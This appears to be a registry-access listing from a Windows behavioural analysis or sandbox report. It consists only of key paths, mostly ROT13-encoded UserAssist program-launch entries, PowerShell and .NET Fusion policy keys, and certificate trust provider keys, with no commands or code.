                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Jvaqbjf Sverjnyy jvgu Nqinaprq Frphevgl.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\NhgbUbgxrl\NhgbUbgxrl.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\NhgbUbgxrl\Pbaireg .nux gb .rkr.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Obkfgnegre\Obkfgnegre Furyy.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Wnin\Nobhg Wnin.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Wnin\Pbasvther Wnin.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Znvagranapr\Perngr Erpbirel Qvfp.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Znvagranapr\Erzbgr Nffvfgnapr.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr 2016 Gbbyf\Qngnonfr Pbzcner 2016.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr 2016 Gbbyf\Bssvpr 2016 Ynathntr Cersreraprf.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr 2016 Gbbyf\Bssvpr 2016 Hcybnq Pragre.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr 2016 Gbbyf\Fxlcr sbe Ohfvarff Erpbeqvat Znantre.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr 2016 Gbbyf\Fcernqfurrg Pbzcner 2016.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr 2016 Gbbyf\Gryrzrgel Qnfuobneq sbe Bssvpr 2016.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr 2016 Gbbyf\Gryrzrgel Ybt sbe Bssvpr 2016.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Clguba 3.8\VQYR (Clguba 3.8 32-ovg).yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Clguba 3.8\Clguba 3.8 (32-ovg).yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Clguba 3.8\Clguba 3.8 Znahnyf (32-ovg).yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Clguba 3.8\Clguba 3.8 Zbqhyr Qbpf (32-ovg).yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\JvaENE\JvaENE.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\P:\Hfref\hfre\Qrfxgbc\Zvpebfbsg Rqtr.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{9R3995NO-1S9P-4S13-O827-48O24O6P7174}\GnfxOne\Zvpebfbsg Rqtr.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{9R3995NO-1S9P-4S13-O827-48O24O6P7174}\GnfxOne\Jvaqbjf Rkcybere.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{9R3995NO-1S9P-4S13-O827-48O24O6P7174}\GnfxOne\Jvaqbjf Zrqvn Cynlre.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\308046O0NS4N39PO;CevingrOebjfvatNHZVQ

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\P:\Hfref\hfre\NccQngn\Ybpny\Zvpebfbsg\BarQevir\BarQevir.rkr

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYPHNPbhag:pgbe

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\aneengbe.rkr

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\bfx.rkr

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\rhqprqvg.rkr

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\JvaENE\JvaENE.rkr

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.ZFNPPRFF.RKR.15

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Nqbor\Npebong Ernqre QP\Ernqre\NpebEq32.rkr

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Puebzr

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.ZrqvnPragre

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.BARABGR.RKR.15

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.BHGYBBX.RKR.15

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.CBJRECAG.RKR.15

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.ZFCHO.RKR.15

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.ylap.rkr.15

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\JvaqbjfNalgvzrHctenqrHV.rkr

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\QIQ Znxre\QIQZnxre.rkr

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.ZrqvnCynlre32

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\7-Mvc\7mSZ.rkr

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\Pbzzba Svyrf\Zvpebfbsg Funerq\Vax\zvc.rkr

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{NN198O3P-PQ8P-7QR1-98Q1-O460S637193O}

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\ArgCebw.rkr

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\FbhaqErpbeqre.rkr

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zboflap.rkr

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.TrggvatFgnegrq

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\Jvaqbjf AG\Npprffbevrf\jbeqcnq.rkr

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{QNN168QR-4306-P8OP-8P11-O596240OQQRQ}

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\puneznc.rkr

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\qsethv.rkr

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{P804OON7-SN5S-POS7-8O55-2096R5S972PO}

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zfvasb32.rkr

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zvtjvm\cbfgzvt.rkr

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zvtjvm\zvtjvm.rkr

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\PropertyBag

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{6D809377-6AF0-444B-8957-A3773F02200E}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{6D809377-6AF0-444B-8957-A3773F02200E}\PropertyBag

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\PropertyBag

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\PropertyBag

                
                HKEY_CLASSES_ROOT\Applications\powershell.exe

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\PropertyBag

                
                HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}

                
                HKEY_CURRENT_USER\Software\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\3

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\PropertyBag

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1381398318-3211537236-2227685884-1000

                
                HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Rpc

                
                HKEY_CURRENT_USER\Software\Classes\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\3\PowerShellEngine

                
                HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MiniNT

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\v4.0

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework

                
                HKEY_CURRENT_USER\Software\Microsoft\.NETFramework

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Powershell.exe

                
                HKEY_CURRENT_USER\Software\Microsoft\Fusion

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\NGen\Policy\v4.0

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\Servicing

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\StrongName

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\PublisherPolicy\Default

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.3.0.Microsoft.PowerShell.ConsoleHost__31bf3856ad364e35

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.3.0.Microsoft.PowerShell.ConsoleHost__31bf3856ad364e35

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System__b77a5c561934e089

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System__b77a5c561934e089

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Configuration__b03f5f7f11d50a3a

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Configuration__b03f5f7f11d50a3a

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Xml__b77a5c561934e089

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Xml__b77a5c561934e089

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.3.0.System.Management.Automation__31bf3856ad364e35

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.3.0.System.Management.Automation__31bf3856ad364e35

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Configuration.Install__b03f5f7f11d50a3a

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Configuration.Install__b03f5f7f11d50a3a

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Core__b77a5c561934e089

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Core__b77a5c561934e089

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Numerics__b77a5c561934e089

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Numerics__b77a5c561934e089

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Security__b03f5f7f11d50a3a

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Security__b03f5f7f11d50a3a

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.1.0.Microsoft.Management.Infrastructure__31bf3856ad364e35

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.Management.Infrastructure__31bf3856ad364e35

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Transactions__b77a5c561934e089

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Transactions__b77a5c561934e089

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.DirectoryServices__b03f5f7f11d50a3a

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.DirectoryServices__b03f5f7f11d50a3a

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.1.0.Microsoft.Management.Infrastructure.Native__31bf3856ad364e35

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.Management.Infrastructure.Native__31bf3856ad364e35

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Runtime.Serialization__b77a5c561934e089

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Runtime.Serialization__b77a5c561934e089

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Management__b03f5f7f11d50a3a

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Management__b03f5f7f11d50a3a

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Data__b77a5c561934e089

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Data__b77a5c561934e089

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.Microsoft.CSharp__b03f5f7f11d50a3a

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.Microsoft.CSharp__b03f5f7f11d50a3a

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.SMDiagnostics__b77a5c561934e089

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.SMDiagnostics__b77a5c561934e089

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\AppContext

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.3.0.System.Management.Automation.resources_en-US_31bf3856ad364e35

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.3.0.System.Management.Automation.resources_en-US_31bf3856ad364e35

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\WSMAN

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1381398318-3211537236-2227685884-1000\Installer\Assemblies\C:|Windows|System32|WindowsPowerShell|v1.0|Powershell.exe

                
                HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\C:|Windows|System32|WindowsPowerShell|v1.0|Powershell.exe

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Windows|System32|WindowsPowerShell|v1.0|Powershell.exe

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1381398318-3211537236-2227685884-1000\Installer\Assemblies\Global

                
                HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\Global

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\Global

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\Providers\Trust\Certificate\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\Providers\Trust\Initialization\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\Providers\Trust\Message\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\Providers\Trust\Signature\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\Providers\Trust\CertCheck\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\Providers\Trust\DiagnosticPolicy\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\Providers\Trust\Cleanup\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}

                
                HKEY_USERS\S-1-5-21-1381398318-3211537236-2227685884-1000

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing

                
                HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\TrustedPublisher\Safer

                
                HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\TrustedPublisher\Safer

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\TrustedPublisher\Safer

                
                HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\crypt32

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\Wintrust\Config

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0
